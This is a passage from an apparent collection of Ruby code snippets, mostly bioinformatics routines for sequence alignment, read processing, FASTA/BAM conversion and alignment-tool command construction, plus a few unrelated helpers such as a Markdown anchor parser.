up_list[refseq_data[:protein_id]]\n unless match_list.nil? # match some uniprot_ids\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid] # ignore unmatch tax\n output_idmap(refseq_data, up_info[:upid])\n match = true\n else # match protein_id but not match tax_id\n output_uptax(up_info)\n $taxup_list[up_info[:taxid]] = true\n $tax_mismatch[\"#{refseq_data[:taxid]}-#{up_info[:taxid]} : #{refseq_data[:protein_id]}\"] = true\n end\n end\n end\n end\n if match == false\n if refseq_data[:gene_id_prefix].nil? ||refseq_data[:gene_id_prefix] == \"\" # can't salvage it by gene_id.\n $no_up += 1\n else # output a file to each prefix of gene_id that can be salvaged by gene_id\n line = [refseq_data[:taxid], refseq_data[:gene_rsrc], refseq_data[:gene_label], refseq_data[:protein_id], refseq_data[:gene_id], refseq_data[:gene_id_prefix]]\n refg_output[refseq_data[:gene_id_prefix]].puts(line.join(\"\\t\"))\n end\n end\n $count += 1\n end\n end\n refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def align_compressed_reads_to_human_genome_reference_using_bowtie\n\t\tputs \"step 7 align compressed reads to human genome reference using bowtie\"\n\t\tfiles.each_pair do |k,v|\n\t\t\t#\tbowtie's verbose is RIDICULOUS!\n\t\t\t#\tIt prints WAY too much and adds WAY too much time.\n\t\t\t#\t\t\t\t\"--verbose \"<<\n\t\t\tcommand = \"bowtie -n #{bowtie_mismatch} -p #{bowtie_threads} -f \" <<\n\t\t\t\t\"-S #{bowtie_index_human} compress_#{k}lane.fa compress_#{k}lane.sam\"\n\t\t\tcommand.execute\n\t\t\t\"compress_#{k}lane.sam\".file_check(die_on_failed_file_check) #\tthe reads that DIDN'T align?\tNO\n\n\t\t\t\"sam2names.rb compress_#{k}lane.sam bowtie_#{k}lane.names\".execute\n\t\t\t\"bowtie_#{k}lane.names\".file_check(die_on_failed_file_check)\n\t\tend\n\n\t\tpull_reads_from_fastas(\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.names\" },\n\t\t\tfiles.keys.sort.collect{|k| \"compress_#{k}lane.fa\" },\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.fa\" })\n\n#\n#\tThis script has fixed input of chopped_leftlane.psl (and right or single)\n#\tBAD. BAD. BAD.\tTODO\n#\tThis is only informative and nothing uses the output\n#\tso could be commented out.\n#\n#\n#\tTODO Replaced with ruby version, but still in development\n#\n#\n#\t\tcommand = \"candidate_non_human.rb \"\n#\t\t#\tfiles is a hash and the keys are not guaranteed to be sorted\n#\t\t#\tsort alphabetically and left is first, right is last (conveniently)\n#\t\tfiles.keys.sort.each{|k| command << \"bowtie_#{k}lane.names \" }\n#\t\tcommand.execute\n#\t\tfile_check( \"candidate_non_human.txt\" )\n\tend",
"def get_clustalw \n answer = []\n self.homology_members.each do |hm|\n answer.push(hm.aligned_sequence)\n end \n return Bio::Alignment::OriginalAlignment.new(answer) \n end",
"def add(alignment, source_index, dest_index)\n @indexes[alignment] = [source_index, dest_index]\n [source_index, dest_index].each do |index|\n @alignments[index] = alignments.fetch(index, Set.new) << alignment\n end\n end",
"def gen_random_seqs(msa_file,noalign_random_file)\n\n #read simple fasta file\n puts `pwd`\n\n\n len_align = 0;\n\n #create new OriginalAlignment\n oa = Bio::Alignment::OriginalAlignment.new()\n #load sequences from file\n Bio::FlatFile.open(Bio::FastaFormat, msa_file) { |ff|\n #store sequence from file\n ff.each_entry { |x| oa.add_seq(x.seq,x.entry_id) }\n }\n\n #remove gaps\n oa.remove_all_gaps!\n #determine ungaped length\n #oa.each_seq { |seq| len_align=[len_align,seq.length].max }\n #show it\n len_align = oa.alignment_length\n\n #store random sequence\n oa = oa.alignment_collect {|key| key = gen_rand_dna_seq(len_align) }\n\n #puts oa.output(:fasta)\n\n #puts result on disk\n simple_seqs_file = File.new(noalign_random_file,\"w\")\n simple_seqs_file.puts(oa.output_fasta)\n simple_seqs_file.close;\n \n end",
"def align_global(protein)\n # Vytvoreni tabulky\n x = protein.sequence.size\n y = @genome.sequence.size\n tab = Array.new(x+1) { Array.new(y+1) }\n\n # Vyplnime prvni radek a sloupec\n for i in 0..x\n tab[i][0] = @@d * i\n end\n for j in 0..y\n tab[0][j] = @@d * j\n end\n\n for i in 1..x\n for j in 1..y\n match = tab[i-1][j-1] + match(i, j, protein)\n delete = tab[i-1][j] + @@d\n insert = tab[i][j-1] + @@d\n\n tab[i][j] = [match, delete, insert].max\n end\n end\n\n @table = tab\n value = tab[x][y]\n EvaluatedProtein.new(protein, value)\n end",
"def buildAlignCommand(readFile, outputFile)\n cmd = \"time \" + @bwaPath + \" aln -t \" + @cpuCores.to_s + \" -I \" +\n @reference + \" \" + readFile + \" > \" + outputFile\n return cmd\n end",
"def mafft_consensus(reads, percentID)\n tmp = Tempfile.new(\"maffttmp\", @temp_path)\n reads.each.with_index(1) do |read_inf, index|\n tmp.puts \">#{read_inf.type}_#{read_inf.start_pos}_#{read_inf.end_pos}-v#{index}\"\n tmp.puts read_inf.seq.upcase\n end\n tmp.flush\n\n env = {}\n if @temp_path && !@temp_path.empty?\n env['TMPDIR'] = @temp_path\n end\n cmd = [@mafft, '--nuc', '--ep', '0.0', '--op', '1', '--genafpair', '--maxiterate', '1000', tmp.path]\n res, err, status = Open3.capture3(env, *cmd)\n unless status.success?\n STDERR.puts(\"mafft stderr:\")\n STDERR.puts(err)\n report_error(status, cmd.join(' '), [tmp]) if status.success?\n end\n tmp.close(true)\n\n # makeing a consensus seq\n align_reads = {}\n res.split(\"\\n>\").each do |align_read|\n align_read_ary = align_read.split(\"\\n\")\n if align_read_ary.last == \">\"\n if align_read_ary[0].start_with?('>')\n read_name = align_read_ary[0][1..-1]\n else\n read_name = align_read_ary[0]\n end\n align_reads[read_name] = align_read_ary[1..-2].join(\"\")\n else\n read_name = align_read_ary[0]\n align_reads[read_name] = align_read_ary[1..-1].join(\"\")\n end\n end\n\n aln = Bio::Alignment.new(align_reads.values.sort)\n align_reads_names = []\n consensus = aln.consensus_string(percentID, gap_mode: -1) # threshold =%id\n\n # tcctcgtgg---tcggctaact------------------------------------------------------- B_136582615_136582615-v90\n # tcctcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # tcctcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # tcctcgtggAGGtcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n check = Hash.new(0) # depth1の場所を探し、trimする\n align_reads.each do |read_name, align_seq|\n read_name = read_name[1..-1] if read_name.start_with?(\">\")\n align_seq.each_char.with_index{ |allele, num| check[num] += 1 if allele != \"-\" }\n align_reads_names << [align_seq, read_name]\n end\n max_num = check.keys.max\n\n new_cons = []\n if align_reads_names.size > 2 # multiple-alignmentの場合\n # tcctcgtgg---tcggctaact------------------------------------------------------- B_136582615_136582615-v90\n # ---tcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # 最初の数文字と最後の数文字はdepth1でも消さない\n # >最初\n bef_index = -1\n flg = 0\n check.sort_by { |k, v| k }.each do |index, cnt|\n if flg == 0 and cnt == 1\n bef_index = index\n elsif flg == 1\n break\n else\n flg = 1\n end\n end\n # >最後\n aft_index = max_num + 1\n flg = 0\n check.sort_by{|k,v|k}.reverse.each do |index, cnt|\n if flg == 0 and cnt == 1\n aft_index = index\n elsif flg == 1\n break\n else\n flg = 1\n end\n end\n\n # align_reads_namesのチェック\n align_reads_names.each do |align_seq, read_name|\n new_align_seq = \"\"\n align_seq.each_char.with_index do |seq, num|\n if num <= bef_index || aft_index <= num # 最初と最後のdepth1\n new_align_seq += seq\n elsif check[num] != 1\n new_align_seq += seq\n end\n end\n end\n consensus.each_char.with_index do |seq, num|\n if num <= bef_index or aft_index <= num # 最初と最後のdepth1\n new_cons << seq\n elsif check[num] != 1\n new_cons << seq\n end\n end\n\n # pairwise-alignmentのときは特になにもせずO.K.\n else\n new_cons = [consensus]\n end\n new_cons = new_cons.join(\"\")\n\n return new_cons, reads.size\n end",
"def alignmentMarkerLoad(inhash)\n \n log_info 'inhash', inhash # 1, 0\n if inhash[:sampleTypes] == 'DNA'\n alignment_markers = find(:item, sample: { name: MARKERS[inhash[:type_ind]][inhash[:cutoff_ind]] })\n elsif inhash[:sampleTypes] == 'RNA'\n alignment_markers = find(:item, { sample: { name: MARKERS[inhash[:type_ind]] } } )\n end\n log_info 'alignment marker ', alignment_markers\n alignment_marker=-1\n if(!(alignment_markers.nil?))\n alignment_marker=alignment_markers[0] \n end\n log_info 'alignment_marker', alignment_marker\n # marker currently in machine (location)\n # marker_in_analyzer = find(:item, object_type: { name: \"Stripwell\" })\n # .find { |s| s.datum[:matrix][0][0] == alignment_marker.sample.id && s.location == \"Fragment analyzer\"} # old version\n \n # TODO: use check_alignment_marker function\n marker_in_analyzer = find(:item, object_type: {name: \"Stripwell\"}).find {|s| s.location == 'Fragment analyzer'}\n \n # is requested marker different from marker in machine?\n different_marker =! (alignment_markers.include?(marker_in_analyzer))\n \n # old marker?\n old_marker=( (marker_in_analyzer.get(:begin_date) ? (Date.today - (Date.parse marker_in_analyzer.get(:begin_date)) >= 7) : true) )\n \n # need to replace? \n marker_needs_replacing = (old_marker) || (different_marker)\n \n # new alignment marker\n alignment_marker_stripwell = find(:item, object_type: { name: \"Stripwell\" })\n .find { |s| collection_from(s).matrix[0][0] == alignment_marker.sample.id &&\n s != marker_in_analyzer }\n \n if(debug) \n show do\n title \"DEBUG\"\n note \"marker_in_analyzer=#{marker_in_analyzer}\"\n note \"different marker = #{different_marker}\"\n note \"marker_needs_replacing = #{marker_needs_replacing}\"\n note \"looking for #{MARKERS[inhash[:type_ind]][inhash[:cutoff_ind]]}\"\n note \"alignment_marker_stripwell = #{alignment_marker_stripwell}\"\n end\n end\n\n # replace alignment marker\n if(marker_needs_replacing && alignment_marker_stripwell) \n show do\n title \"Place stripwell #{alignment_marker_stripwell} in buffer array\"\n note \"Move to the fragment analyzer.\"\n note \"Open ScreenGel software.\"\n check \"Click on the <b>Load Position</b> icon.\"\n check \"Open the sample door and retrieve the buffer tray.\"\n warning \"Be VERY careful while handling the buffer tray! Buffers can spill.\"\n if old_marker\n check \"Discard the current alignment marker stripwell (labeled #{marker_in_analyzer}).\"\n end\n check \"Place the alignment marker stripwell labeled #{alignment_marker_stripwell} in the MARKER 1 position of the buffer array.\"\n image \"make_marker_placement\"\n check \"Place the buffer tray in the buffer tray holder\"\n image \"make_marker_tray_holder\"\n check \"Close the sample door.\"\n end\n alignment_marker_stripwell.location = \"Fragment analyzer\"\n alignment_marker_stripwell.save\n if(old_marker) # replaced because old one was outdated\n alignment_marker_stripwell.associate :begin_date, Date.today.strftime \n alignment_marker_stripwell.save\n release [alignment_marker_stripwell] \n marker_in_analyzer.mark_as_deleted # trash outdated marker\n else # move current marker to SF2 (small fridge 2)\n marker_in_analyzer.location = \"SF2\"\n marker_in_analyzer.save\n end\n end\n end",
"def align\n i = @max_cell_row\n j = @max_cell_column\n @first_result = \"\" \n @second_result = \"\" \n gaps_in_first = 0 # count of gaps in each sequence\n gaps_in_second = 0\n\n while true\n\n # end local alignment at 0 cell\n if @traceback_matrix[i, j] == 0\n break\n end\n\n # match/mismatch\n if @traceback_matrix[i, j] == 1\n @first_result << @first_string[i-1]\n @second_result << @second_string[j-1]\n i -= 1\n j -= 1\n end\n\n # deletion -> gap in S1\n if @traceback_matrix[i, j] == 2\n @first_result << \"-\"\n @second_result << @second_string[j-1]\n j -= 1\n gaps_in_first += 1\n end\n\n # insertion -> gap in S2\n if @traceback_matrix[i, j] == 3\n @first_result << @first_string[i-1]\n @second_result << \"-\"\n i -= 1\n gaps_in_second += 1\n end\n\n end\n # set variables to make writing to file prettier\n set_variables(gaps_in_first, gaps_in_second)\n end",
"def align(align=nil)\n @options[:align] = align unless align.nil?\n @options[:align]\n end",
"def dna_align_features(analysis_name = nil)\n \tif analysis_name.nil?\n return DnaAlignFeature.find_by_sql('SELECT * FROM dna_align_feature WHERE seq_region_id = ' + self.seq_region.id.to_s + ' AND seq_region_start >= ' + self.start.to_s + ' AND seq_region_end <= ' + self.stop.to_s)\n else\n analysis = Analysis.find_by_logic_name(analysis_name)\n return DnaAlignFeature.find_by_sql('SELECT * FROM dna_align_feature WHERE seq_region_id = ' + self.seq_region.id.to_s + ' AND seq_region_start >= ' + self.start.to_s + ' AND seq_region_end <= ' + self.stop.to_s + ' AND analysis_id = ' + analysis.id.to_s)\n end\n end",
"def getDna (cds, seq)\n loc = cds.locations\n sbeg = loc[0].from.to_i\n send = loc[0].to.to_i\n fasta = Bio::Sequence::NA.new(seq.subseq(sbeg,send))\n position = \"#{sbeg}..#{send}\"\n if loc[0].strand == -1\n fasta.reverse_complement!\n end\n dna = Bio::Sequence.auto(fasta)\n return dna\nend",
"def align_all_local\n @results = []\n @proteins.each { |protein|\n @results << align_local(protein)\n }\n @results = @results.sort_by { |evaluated_protein| evaluated_protein.value }\n end",
"def fastafile_to_fastastring(filename)\n oa = Bio::Alignment::OriginalAlignment.new()\n #load sequences from file\n Bio::FlatFile.open(Bio::FastaFormat, filename) { |ff|\n #store sequence from file\n ff.each_entry { |x| oa.add_seq(x.seq,x.entry_id) }\n }\n return oa.output(:fasta)\n\n end",
"def alignment_of(member)\n self::MEMBERS_HASH[member].alignment\n end",
"def seqshash_to_fastafile(seqs,filename)\n oa = Bio::Alignment::OriginalAlignment.new(seqs)\n string_to_file(oa.output(:fasta),filename)\n\n end",
"def remapped_reads(input_file, output_file, read_length, mm=2)\n\t\tremapped = {}\n\t\t\n\t\t# Filter remapped reads\n\t\tinput_file.each do |line|\n\t\t\tmdz = line.match(/MD:Z:\\S*/).to_s\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\tqname, mate = line[0].split('/')\n\t\t\tpos = line[2].split(':')\n\t\t\tcigar = line[5]\n\t\n\t\t\tif !remapped.has_key?(qname) && Alignment.max_mismatches?(mdz, mm) && cigar == \"#{read_length}M\"\n\t\t\t\tremapped[qname] = [pos, mate]\n\t\t\telse\t\n\t\t\t\tremapped.delete(qname)\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\tremapped.each {|k, v| output.puts [\"#{k}/#{v[-1]}\", v[0]].join(\"\\t\")}\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found remapped reads.\"\n\tend",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation succeded.\"\t\n\tend",
"def align=(align)\n set_align(align)\n generate_buffers\n end",
"def get_4d_simplealign\n raise \"not implemented\"\n end",
"def option_align\n @align = true\n end",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation finished.\"\t\n\tend",
"def align_column n, alignment\n r = rows\n column(n).each_with_index do |col, i|\n r[i][n] = { :value => col, :alignment => alignment } unless Hash === col\n end\n end",
"def on_process_sequence(seq_name,seq_fasta)\n # subclasses may override this method\n end",
"def align_all_words\n 0.upto(word_list.length-1) do |i|\n 0.upto(i-1) do |j|\n w1 = self[i]\n w2 = self[j]\n if (w1.meaning & w2.meaning).empty?\n LOGGER.debug(\"Skipping alignment for\\n\" +\n \"#{w1}\\n#{w2}\\nbecause they share no meaning\")\n next\n end\n @alignment_table.add(Alignment.new(w1, w2), i, j)\n end\n end\n end",
"def aligned?\n true\n end",
"def dna_align_features(analysis_name = nil)\r\n \tif analysis_name.nil?\r\n return DnaAlignFeature.find_by_sql('SELECT * FROM dna_align_feature WHERE seq_region_id = ' + self.seq_region.id.to_s + ' AND seq_region_start >= ' + self.start.to_s + ' AND seq_region_end <= ' + self.stop.to_s)\r\n else\r\n analysis = Analysis.find_by_logic_name(analysis_name)\r\n return DnaAlignFeature.find_by_sql('SELECT * FROM dna_align_feature WHERE seq_region_id = ' + self.seq_region.id.to_s + ' AND seq_region_start >= ' + self.start.to_s + ' AND seq_region_end <= ' + self.stop.to_s + ' AND analysis_id = ' + analysis.id.to_s)\r\n end\r\n end",
"def mrna\n unless defined?(@mrna)\n @mrna = SeqDesc.parse(@d0.find { |x| /^mRNA\\:/ =~ x })\n end\n @mrna\n end",
"def alignContinuations(theLines)\n\n\tsplitAndAlign(theLines, /^(.*?)\\s+(\\\\)$/, \"\");\n\nend",
"def [](index)\n alignments.fetch(index, DEFAULT)\n end",
"def align_sequences_nm(sequence1, sequence2, scores)\n # Dynamic programming.\n dp = Array.new(sequence1.length + 1) { Array.new(sequence2.length + 1) }\n gap_score = scores['-']['-']\n dp[0][0] = [0, 0, 0, '|', '|']\n sequence1.chars.each_with_index do |c, i|\n dp[i + 1][0] = [(i + 1) * gap_score, 1, 0, c, '-']\n end\n sequence2.chars.each_with_index do |c, j|\n dp[0][j + 1] = [(j + 1) * gap_score, 0, 1, '-', c]\n end\n sequence1.chars.each_with_index do |base1, i|\n sequence2.chars.each_with_index do |base2, j|\n dp[i + 1][j + 1] = [[0, 1, '-', base2], [1, 0, '-', base1],\n [1, 1, base1, base2]].map { |i1, j1, match1, match2|\n [dp[i - i1 + 1][j - j1 + 1].first + scores[match1][match2],\n i1, j1, match1, match2]\n }.max\n end\n end\n \n # Solution reconstruction.\n i, j = *[sequence1, sequence2].map(&:length)\n match_score = dp[i][j].first\n align1, align2 = '', ''\n until i == 0 && j == 0\n score, i1, j1, base1, base2 = *dp[i][j]\n align1 << base1; i -= i1 \n align2 << base2; j -= j1\n end\n \n # Return values\n scores = dp.map { |line| line.map(&:first) }\n words = { [1, 0] => '$\\\\uparrow$', [0, 1] => '$\\\\leftarrow$',\n [1, 1] => '$\\\\nwarrow$', [0, 0] => '$\\\\cdot$'}\n parents = dp.map { |line| line.map { |item| words[item[1, 2]] } }\n { :scores => scores, :parents => parents, :match_score => match_score,\n :aligns => [align1, align2].map(&:reverse) }\nend",
"def rna_to_amino_acid(rna)\n # Protein Translation Problem: Translate an RNA string into an amino acid string.\n # Input: An RNA string Pattern and the array GeneticCode.\n # Output: The translation of Pattern into an amino acid string Peptide. \n\n r_to_c_h = rna_to_codon_hash\n # puts r_to_c_h\n i = 0\n codon_length = 3\n amino_acid = \"\"\n while (codon = rna.slice(i, codon_length)) do\n # puts codon\n # puts r_to_c_h[codon.to_sym]\n break if codon.empty?\n amino_acid += r_to_c_h[codon.to_sym].to_s\n i += codon_length\n end\n return amino_acid\n end",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped.bam into fastq-format.\"\t\n\tend",
"def get_aligned_data(n)\n # n must be aligned\n res, @data = @data.unpack(\"a#{n}a*\")\n self.underrun! unless res\n res\n end",
"def text_align(alignment)\n Kernel.raise ArgumentError, \"Unknown alignment constant: #{alignment}\" unless ALIGN_TYPE_NAMES.key?(alignment.to_i)\n primitive \"text-align #{ALIGN_TYPE_NAMES[alignment.to_i]}\"\n end",
"def alignment_node(node)\n ancestor_node = ancestor_node(node)\n\n return ancestor_node if ancestor_node.nil? ||\n ancestor_node.kwbegin_type?\n\n assignment_node = assignment_node(ancestor_node)\n return assignment_node if same_line?(ancestor_node, assignment_node)\n\n access_modifier_node = access_modifier_node(ancestor_node)\n return access_modifier_node unless access_modifier_node.nil?\n\n ancestor_node\n end",
"def transform_anchors( str, rs )\n\t\t\t@log.debug \" Transforming anchors\"\n\t\t\t@scanner.string = str.dup\n\t\t\ttext = ''\n\n\t\t\t# Scan the whole string\n\t\t\tuntil @scanner.empty?\n\n\t\t\t\tif @scanner.scan( /\\[/ )\n\t\t\t\t\tlink = ''; linkid = ''\n\t\t\t\t\tdepth = 1\n\t\t\t\t\tstartpos = @scanner.pos\n\t\t\t\t\t@log.debug \" Found a bracket-open at %d\" % startpos\n\n\t\t\t\t\t# Scan the rest of the tag, allowing unlimited nested []s. If\n\t\t\t\t\t# the scanner runs out of text before the opening bracket is\n\t\t\t\t\t# closed, append the text and return (wasn't a valid anchor).\n\t\t\t\t\twhile depth.nonzero?\n\t\t\t\t\t\tlinktext = @scanner.scan_until( /\\]|\\[/ )\n\n\t\t\t\t\t\tif linktext\n\t\t\t\t\t\t\t@log.debug \" Found a bracket at depth %d: %p\" % [ depth, linktext ]\n\t\t\t\t\t\t\tlink += linktext\n\n\t\t\t\t\t\t\t# Decrement depth for each closing bracket\n\t\t\t\t\t\t\tdepth += ( linktext[-1, 1] == ']' ? -1 : 1 )\n\t\t\t\t\t\t\t@log.debug \" Depth is now #{depth}\"\n\n\t\t\t\t\t\t# If there's no more brackets, it must not be an anchor, so\n\t\t\t\t\t\t# just abort.\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\t@log.debug \" Missing closing brace, assuming non-link.\"\n\t\t\t\t\t\t\tlink += @scanner.rest\n\t\t\t\t\t\t\t@scanner.terminate\n\t\t\t\t\t\t\treturn text + '[' + link\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\t\tlink.slice!( -1 ) # Trim final ']'\n\t\t\t\t\t@log.debug \" Found leading link %p\" % link\n\n\n\n\t\t\t\t\t# Markdown Extra: Footnote\n\t\t\t\t\tif link =~ /^\\^(.+)/ then\n\t\t\t\t\t\tid = $1\n\t\t\t\t\t\tif rs.footnotes[id] then\n\t\t\t\t\t\t\trs.found_footnote_ids << id\n\t\t\t\t\t\t\tlabel = \"[#{rs.found_footnote_ids.size}]\"\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\trs.warnings << \"undefined footnote id - #{id}\"\n\t\t\t\t\t\t\tlabel = '[?]'\n\t\t\t\t\t\tend\n\n\t\t\t\t\t\ttext += %Q|<sup id=\"footnote-ref:#{id}\"><a href=\"#footnote:#{id}\" rel=\"footnote\">#{label}</a></sup>|\n\n\t\t\t\t\t# Look for a reference-style second part\n\t\t\t\t\telsif @scanner.scan( RefLinkIdRegexp )\n\t\t\t\t\t\tlinkid = @scanner[1]\n\t\t\t\t\t\tlinkid = link.dup if linkid.empty?\n\t\t\t\t\t\tlinkid.downcase!\n\t\t\t\t\t\t@log.debug \" Found a linkid: %p\" % linkid\n\n\t\t\t\t\t\t# If there's a matching link in the link table, build an\n\t\t\t\t\t\t# anchor tag for it.\n\t\t\t\t\t\tif rs.urls.key?( linkid )\n\t\t\t\t\t\t\t@log.debug \" Found link key in the link table: %p\" % rs.urls[linkid]\n\t\t\t\t\t\t\turl = escape_md( rs.urls[linkid] )\n\n\t\t\t\t\t\t\ttext += %{<a href=\"#{url}\"}\n\t\t\t\t\t\t\tif rs.titles.key?(linkid)\n\t\t\t\t\t\t\t\ttext += %{ title=\"%s\"} % escape_md( rs.titles[linkid] )\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\t\ttext += %{>#{link}</a>}\n\n\t\t\t\t\t\t# If the link referred to doesn't exist, just append the raw\n\t\t\t\t\t\t# source to the result\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\t@log.debug \" Linkid %p not found in link table\" % linkid\n\t\t\t\t\t\t\t@log.debug \" Appending original string instead: \"\n\t\t\t\t\t\t\t@log.debug \"%p\" % @scanner.string[ startpos-1 .. @scanner.pos-1 ]\n\n\t\t\t\t\t\t\trs.warnings << \"link-id not found - #{linkid}\"\n\t\t\t\t\t\t\ttext += @scanner.string[ startpos-1 .. 
@scanner.pos-1 ]\n\t\t\t\t\t\tend\n\n\t\t\t\t\t# ...or for an inline style second part\n\t\t\t\t\telsif @scanner.scan( InlineLinkRegexp )\n\t\t\t\t\t\turl = @scanner[1]\n\t\t\t\t\t\ttitle = @scanner[3]\n\t\t\t\t\t\t@log.debug \" Found an inline link to %p\" % url\n\n\t\t\t\t\t\turl = \"##{link}\" if url == '#' # target anchor briefing (since AoBane 0.40)\n\n\t\t\t\t\t\ttext += %{<a href=\"%s\"} % escape_md( url )\n\t\t\t\t\t\tif title\n\t\t\t\t\t\t\ttitle.gsub!( /\"/, \""\" )\n\t\t\t\t\t\t\ttext += %{ title=\"%s\"} % escape_md( title )\n\t\t\t\t\t\tend\n\t\t\t\t\t\ttext += %{>#{link}</a>}\n\n\t\t\t\t\t# No linkid part: just append the first part as-is.\n\t\t\t\t\telse\n\t\t\t\t\t\t@log.debug \"No linkid, so no anchor. Appending literal text.\"\n\t\t\t\t\t\ttext += @scanner.string[ startpos-1 .. @scanner.pos-1 ]\n\t\t\t\t\tend # if linkid\n\n\t\t\t\t# Plain text\n\t\t\t\telse\n\t\t\t\t\t@log.debug \" Scanning to the next link from %p\" % @scanner.rest\n\t\t\t\t\ttext += @scanner.scan( /[^\\[]+/ )\n\t\t\t\tend\n\n\t\t\tend # until @scanner.empty?\n\n\t\t\treturn text\n\t\tend",
"def aligned?\n false\n end",
"def aligned?\n false\n end",
"def getFtsSequences\n @gb.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n loc = \"c#{ft.locations[0].to_s}\" if ft.locations[0].strand == -1\n gene = []\n product = []\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n dna = getDna(ft,@gb.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{loc}|#{ftH[\"protein_id\"][0]}|#{gene[0]}|#{product[0]}|#{@org}\",60)\n puts seqout\n end\nend",
"def getDna (cds, seq)\n loc = cds.locations\n sbeg = loc[0].from.to_i\n send = loc[0].to.to_i\n fasta = Bio::Sequence::NA.new(seq.subseq(sbeg,send))\n position = \"#{sbeg}..#{send}\"\n if loc[0].strand == -1\n fasta.reverse_complement!\n end\n dna = Bio::Sequence.auto(fasta)\n return dna\n end",
"def update_anchor_create_loc(_bib, eref, docid)\n ins = eref.at(ns(\"./localityStack\")) or return\n type = ins.at(ns(\"./locality/@type\"))&.text\n type = \"clause\" if type == \"annex\"\n ref = ins.at(ns(\"./locality/referenceFrom\"))&.text\n #anchor = @files[docid][:anchors].dig(type, ref) or return\n anchor = @files.get(docid,:anchors).dig(type, ref) or return\n ins << \"<locality type='anchor'><referenceFrom>#{anchor.sub(/^_/, '')}\" \\\n \"</referenceFrom></locality>\"\n end",
